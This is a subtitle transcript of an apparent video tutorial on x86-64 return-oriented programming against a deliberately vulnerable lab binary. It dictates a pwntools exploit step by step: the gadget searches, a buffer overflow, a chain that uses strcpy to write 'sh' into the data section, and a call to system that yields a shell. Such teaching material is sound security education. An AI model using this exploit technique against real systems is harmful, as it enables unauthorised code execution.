1 00:00:00,570 --> 00:00:02,280 All right, let's check if I'm recording.
2 00:00:02,310 --> 00:00:03,180 Yes, I am.
3 00:00:03,300 --> 00:00:03,810 All right.
4 00:00:03,810 --> 00:00:04,830 So welcome back.
5 00:00:04,830 --> 00:00:07,800 And we're now going to do something more advanced.
6 00:00:08,220 --> 00:00:15,840 We have yet to do the ret2plt attack, but we're going to create a shell string by abusing
7 00:00:15,840 --> 00:00:16,590 strcpy.
8 00:00:17,370 --> 00:00:23,730 Before we do that, let's cover what calling conventions are for Linux x86.
9 00:00:23,730 --> 00:00:33,480 So the way that Linux x86-64... I'm sorry, I just have a lot of people annoying me right now.
10 00:00:34,080 --> 00:00:49,350 So how it happens is that in Linux, user functions use the RDI register, RSI register, RDX register, RCX register,
11 00:00:49,680 --> 00:00:58,890 R8 and R9, and anything else past the sixth argument is actually going to be a distance from the
12 00:00:58,890 --> 00:01:00,480 return stack pointer.
13 00:01:01,590 --> 00:01:09,240 So we're actually going to be using a hardcoded strcpy function, or string copy function, to pop a
14 00:01:09,240 --> 00:01:11,070 shell on this vulnerable binary.
15 00:01:11,460 --> 00:01:19,470 And we're going to be copying the characters s and h into the writable data segment and then calling system
16 00:01:20,760 --> 00:01:23,820 on the RDI register to invoke our root-level shell.
17 00:01:23,820 --> 00:01:27,270 So this is where it's going to get a little bit more difficult.
18 00:01:27,480 --> 00:01:34,590 So we're going to go back to our session and then we're going to do gdb 3vol -q.
19 00:01:36,490 --> 00:01:40,370 Then press r. Let's just x out of... Control-C.
20 00:01:40,390 --> 00:01:43,060 vmmap.
21 00:01:43,420 --> 00:01:44,320 Oh, my God.
22 00:01:44,560 --> 00:01:45,040 No, sorry.
23 00:01:45,130 --> 00:01:48,610 Just somebody on Discord. To load the...
24 00:01:49,200 --> 00:01:51,230 The address range of our binary.
25 00:01:51,250 --> 00:01:56,170 We only care about what starts here and what stops here.
26 00:01:56,380 --> 00:02:08,470 So we're going to do set $start, and then click on the end, set $end.
27 00:02:11,830 --> 00:02:17,970 And we're going to search for our strings, which is basically the characters s and h.
28 00:02:17,980 --> 00:02:30,520 So what you do, in pwndbg or gef, is search-pattern s $start-$end, so make sure you use the $ variables.
29 00:02:31,750 --> 00:02:33,820 I'm just going to stop Discord right now.
30 00:02:38,410 --> 00:02:39,370 Oh, my God.
31 00:02:45,310 --> 00:02:45,500 Okay.
32 00:02:45,640 --> 00:02:46,510 Quit Discord.
33 00:02:46,630 --> 00:02:47,050 Finally.
34 00:02:48,100 --> 00:02:50,450 And then we're going to enter the binary, 3vol.
35 00:02:53,350 --> 00:02:56,560 So we have the character s in this memory address.
36 00:02:57,430 --> 00:03:02,020 So we're going to take this and we're going to save it in our script.
37 00:03:02,020 --> 00:03:05,320 So from pwn import *.
38 00:03:08,050 --> 00:03:10,510 Let's see, attempt3.py.
39 00:03:13,990 --> 00:03:20,650 s_address equals this, and then we're going to do it again for the h character.
40 00:03:23,530 --> 00:03:27,660 So we've found an h right here somewhere, right?
41 00:03:27,670 --> 00:03:31,360 h_address equals this.
42 00:03:40,280 --> 00:03:43,370 Once again, we're going to go back into our function.
43 00:03:43,760 --> 00:03:49,310 So we're going to go into our debugger and we're going to do disassemble show date.
44 00:03:53,850 --> 00:03:57,630 And when I disassemble this memory address, you notice that it is different.
45 00:04:00,120 --> 00:04:03,500 And I just want to point out the system call right here.
46 00:04:03,510 --> 00:04:04,320 All right.
47 00:04:04,710 --> 00:04:10,680 This address may be different depending on what kind of virtual machine and app that you're running
48 00:04:10,680 --> 00:04:11,310 this on.
49 00:04:11,580 --> 00:04:15,330 So just take note that this address right here could be different.
50 00:04:15,330 --> 00:04:19,560 But in our case, this call is actually the same address.
51 00:04:19,560 --> 00:04:23,010 So we're going to do system equals this.
52 00:04:27,910 --> 00:04:37,510 And finally we need a section to read, or to write, our s and h into for our ROP chain.
53 00:04:38,530 --> 00:04:39,910 So let's go back.
54 00:04:40,300 --> 00:04:41,740 We're going to split the screen.
55 00:04:42,730 --> 00:04:44,010 We're going to readelf
56 00:04:44,800 --> 00:04:47,810 -S 3vol.
57 00:04:49,800 --> 00:04:50,640 Selfie.
58 00:04:51,300 --> 00:04:54,960 All I did was press Control-Z, by the way. Control-Z, and it zooms.
59 00:04:55,410 --> 00:05:02,220 So notice that the data section right here, which starts at this memory address, is writable.
60 00:05:03,000 --> 00:05:12,060 So we can actually use this and insert our shell function, or our shell variable.
61 00:05:12,330 --> 00:05:19,770 So we can call this write2 equals the hex number, that.
62 00:05:27,740 --> 00:05:32,060 And we also have an unused strcpy function.
63 00:05:32,060 --> 00:05:38,420 So we're going to go back, disassemble unused
64 00:05:41,600 --> 00:05:43,250 and, of course, strcpy.
65 00:05:46,090 --> 00:05:51,250 Now make sure to disassemble this memory address, which is disassemble here.
66 00:05:53,310 --> 00:05:58,350 And note that strcpy is called at this memory address, which is actually exactly the same.
67 00:05:58,360 --> 00:06:04,590 But like I said before, depending on your compiler version, this could be a different address.
68 00:06:04,590 --> 00:06:07,470 So be wary of that.
69 00:06:09,510 --> 00:06:13,740 So strcpy_func equals this.
70 00:06:20,190 --> 00:06:26,490 And we're also going to have an issue with ropper, because when we search for our gadgets in ropper,
71 00:06:26,490 --> 00:06:33,120 so Control-B Shift-5, ropper, file 3vol.
72 00:06:34,140 --> 00:06:43,650 We're not going to find a proper pop rsi instruction, but we will find a proper pop rdi instruction.
73 00:06:44,040 --> 00:06:48,210 So first we want to search for... search /1 ret.
74 00:06:49,020 --> 00:06:52,470 This would be nice to use: ret equals.
75 00:06:55,230 --> 00:06:58,470 We're also going to look for search pop rdi.
76 00:07:02,870 --> 00:07:09,320 pop rdi, and search pop
77 00:07:09,350 --> 00:07:16,790 rsi. So this is the issue I'm talking about, is that we have an additional instruction,
78 00:07:16,790 --> 00:07:25,250 pop r15. We do not have any other ways of having a pop rsi instruction alone, but we will have a
79 00:07:25,250 --> 00:07:26,000 workaround for that.
80 00:07:26,000 --> 00:07:27,920 So let's just copy this memory address.
81 00:07:30,800 --> 00:07:36,980 pop rsi; pop r15; ret.
82 00:07:41,460 --> 00:07:43,500 With these gadgets in hand,
83 00:07:43,500 --> 00:07:52,320 what you want to do is that you need to write a dummy address, because a 64-bit register can hold eight
84 00:07:52,320 --> 00:07:53,940 bytes, or 64 bits.
85 00:07:53,940 --> 00:07:57,330 So 64 divided by eight is eight bytes.
86 00:07:57,600 --> 00:08:02,850 So we're going to write a dummy address, turn it to bytes,
87 00:08:07,110 --> 00:08:08,940 multiplied by eight characters.
88 00:08:10,710 --> 00:08:15,210 We're going to use the same buffer overflow vulnerability that we have before.
89 00:08:16,500 --> 00:08:23,730 Remember, this one overwrites the return base pointer: buff plus equals b
90 00:08:26,540 --> 00:08:30,290 \x42, or if you're just lazy, \x42
91 00:08:33,500 --> 00:08:47,870 times eight overwrites the return stack pointer, and now we're going to copy the character s to the data
92 00:08:47,870 --> 00:08:48,560 section.
93 00:08:50,140 --> 00:08:55,550 So we add to our buffer, or ROP chain, p64 ret.
94 00:08:55,570 --> 00:09:09,400 Remember, what's happening here is struct.pack: pack a little-endian 64-bit return address from here.
95 00:09:12,910 --> 00:09:23,350 So buff again plus equals p64 pop rdi ret; buff plus equals p64
96 00:09:23,770 --> 00:09:25,090 write2.
97 00:09:25,780 --> 00:09:35,080 That's our location inside the data segment, the data segment to write the characters
98 00:09:35,770 --> 00:09:36,790 sh to.
99 00:09:42,280 --> 00:09:47,740 buff plus equals p64 s_address.
100 00:09:49,860 --> 00:09:58,710 Write the character s to data. buff plus equals dummy.
101 00:10:01,190 --> 00:10:03,560 buff plus equals p64
102 00:10:05,180 --> 00:10:06,740 strcpy_func.
103 00:10:12,110 --> 00:10:18,290 Now we're going to copy the character h to the data segment.
104 00:10:19,250 --> 00:10:20,420 So we're going to repeat it.
105 00:10:20,420 --> 00:10:25,610 So maybe I did not explain this enough in ROP training, but you can reuse your gadgets as much as you
106 00:10:25,610 --> 00:10:29,090 want, as long as you can fulfill the correct calling conventions.
107 00:10:31,340 --> 00:10:33,770 So what we're going to do is:
108 00:10:35,350 --> 00:10:46,060 buff plus equals p64 pop rdi ret; buff plus equals p64
109 00:10:47,110 --> 00:10:47,620 write
110 00:10:47,770 --> 00:10:50,780 2 plus 0x1.
111 00:10:50,800 --> 00:11:04,000 Now, the reason why we're doing this is we are seeking plus one byte, because we don't want to overwrite
112 00:11:05,410 --> 00:11:09,670 our s character in the data segment.
113 00:11:11,080 --> 00:11:14,860 So we're going to move past the write2 location.
114 00:11:15,850 --> 00:11:21,040 So we're just adding one to this character right here so we can put our h right there.
115 00:11:23,170 --> 00:11:32,230 Finally, we're going to use our p64 pop rsi; pop r15; ret.
116 00:11:38,010 --> 00:11:41,820 And then we're finally pushing our h character:
117 00:11:44,640 --> 00:11:52,080 buff plus equals dummy; buff plus equals p64 strcpy_func.
118 00:11:55,040 --> 00:11:59,330 And now we have to call our shell.
119 00:12:00,020 --> 00:12:01,010 Well, with the system function.
120 00:12:01,010 --> 00:12:05,440 So now we're going to call system with rdi.
121 00:12:07,130 --> 00:12:16,910 So it's going to be buff plus equals p64 pop rdi ret; buff plus equals
122 00:12:18,840 --> 00:12:19,840 p64
123 00:12:19,990 --> 00:12:21,040 write2.
124 00:12:24,720 --> 00:12:28,770 buff plus equals p64 system.
125 00:12:30,990 --> 00:12:34,440 And then it's just the standard sys.stdout,
126 00:12:34,650 --> 00:12:35,880 buffer.write,
127 00:12:36,280 --> 00:12:39,540 buff, which means it just writes to the screen and then we redirect it.
128 00:12:40,050 --> 00:12:41,580 So let's see if this exploit works.
129 00:12:41,580 --> 00:12:43,320 I may have made a mistake somewhere.
130 00:12:46,710 --> 00:12:47,790 Let's go back.
131 00:12:49,380 --> 00:12:50,910 Let's Control-B split.
132 00:12:56,760 --> 00:12:59,360 nano attempt3.py.
133 00:13:06,020 --> 00:13:06,550 Let's see.
134 00:13:06,560 --> 00:13:09,710 python3 attempt3.
135 00:13:18,450 --> 00:13:20,370 Oh, we do have a mistake.
136 00:13:20,430 --> 00:13:21,060 sys.
137 00:13:28,730 --> 00:13:30,980 And attempt3.
138 00:13:39,970 --> 00:13:40,820 This won't work.
139 00:13:41,140 --> 00:13:42,200 Let's clear.
140 00:13:42,920 --> 00:13:44,300 So python3.
141 00:13:46,130 --> 00:13:46,820 Let's see.
142 00:13:47,180 --> 00:13:48,440 attempt3
143 00:13:49,100 --> 00:13:56,360 .py; cat) | ./3vol.
144 00:13:58,520 --> 00:14:00,410 It asks you for a date-time function.
145 00:14:03,180 --> 00:14:04,410 Press enter again.
146 00:14:04,710 --> 00:14:08,100 id. Okay, we have a shell.
147 00:14:08,550 --> 00:14:09,810 Let's see what's going on.